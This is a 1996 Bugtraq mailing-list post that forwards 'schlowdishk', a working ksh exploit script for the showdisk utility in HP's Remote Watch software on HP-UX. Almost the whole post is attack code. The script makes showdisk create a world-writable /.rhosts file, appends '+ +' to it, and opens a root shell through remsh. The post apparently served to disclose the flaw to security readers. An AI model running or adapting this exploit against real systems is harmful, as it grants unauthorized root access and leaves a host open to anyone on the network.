[3508] in bugtraq
HPUX schlowdishk
daemon@ATHENA.MIT.EDU (Aleph One)
Sat Oct 19 11:22:57 1996
Date: Sat, 19 Oct 1996 00:22:03 -0700
Reply-To: Aleph One <aleph1@dfw.net>
From: Aleph One <aleph1@dfw.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
This is a multi-part message in MIME format.
--------------5B18EC97719CDB2178910D76
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
http://command.com.inter.net/~sod/schlowdishk
--------------5B18EC97719CDB2178910D76
Content-Type: text/plain; charset=us-ascii; name="schlowdishk"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="schlowdishk"
#!/bin/ksh
# OK.. this bug gets inserted into remwatch after the patch.. It was there
# before in some versions, but now it's pretty much universal if the patch
# gets installed...
# Silly Scriptor & friend, SOD, (11Jun96)
if [ ! -x /usr/remwatch/bin/disks/showdisk ]
then
echo This is an exploit for the showdisk utility internal to
echo HP\'s Remote Watch series of programs.
echo The showdisk utility doesn\'t appear to be on your system.
echo Moo
exit
fi
FILE=$1
if [ -z "$FILE" ]
then
FILE=/.rhosts
fi
if [ -f "$FILE" ]
then
echo "Hey, there already a ${FILE}!"
echo "I'd rather enjoy making new files, thank you very much..."
exit
fi
umask 0000
/usr/remwatch/bin/disks/showdisk arg arg ${FILE} arg > /dev/null 2>&1
>${FILE}
ls -l ${FILE}
if [ "${FILE}" = "/.rhosts" ]
then
echo "Adding + + ..."
echo "+ +" >> /.rhosts
remsh localhost -l root ksh -i
fi
--------------5B18EC97719CDB2178910D76--
